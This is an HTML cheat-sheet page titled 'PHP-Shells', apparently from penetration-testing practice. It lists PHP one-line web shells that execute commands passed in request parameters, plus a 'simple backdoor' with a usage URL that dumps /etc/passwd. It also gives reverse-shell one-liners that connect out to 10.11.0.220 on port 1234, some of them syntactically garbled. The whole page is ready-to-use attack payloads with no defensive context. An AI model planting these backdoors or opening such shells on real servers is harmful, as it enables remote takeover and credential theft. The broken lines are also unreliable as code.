<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>PHP-Shells</title>
</head><body><span style="font-size: 14pt"><span style="color: #ff0000">Try this first</span></span><br/>
<br/>
&lt;?php echo exec($_REQUEST['c']);?&gt;<br/>
<br/>
<span style="color: #ff0000"><span style="font-size: 14pt">Try this next if the first doesn't work</span></span><br/>
<br/>
&lt;?php echo exec($_GET['c']); ?&gt;<br/>
<br/>
&lt;?php -r '$sock=fsockopen(10.11.0.220",1234);exec("/bin/sh -i &lt;&amp;d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)' ?&gt;<br/>
<br/>
<br/>
<span style="color: #ff0000"><span style="font-size: 14pt">Simple PHP Backdoor By DK (One-Liner Version) </span></span>&nbsp; &nbsp; <br/>
<br/>
<span style="color: #ff0000"><span style="font-size: 12pt">Usage: </span></span><br/>
<br/>
http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd <br/>
<br/>
&nbsp;&lt;?php if(isset($_REQUEST['cmd'])){ echo "&lt;pre&gt;"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "&lt;/pre&gt;"; die; }?&gt;<br/>
<br/>
<br/>
php -r '$sock=fsockopen(10.11.0.220",1234);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'<br/>
<br/>
</body></html>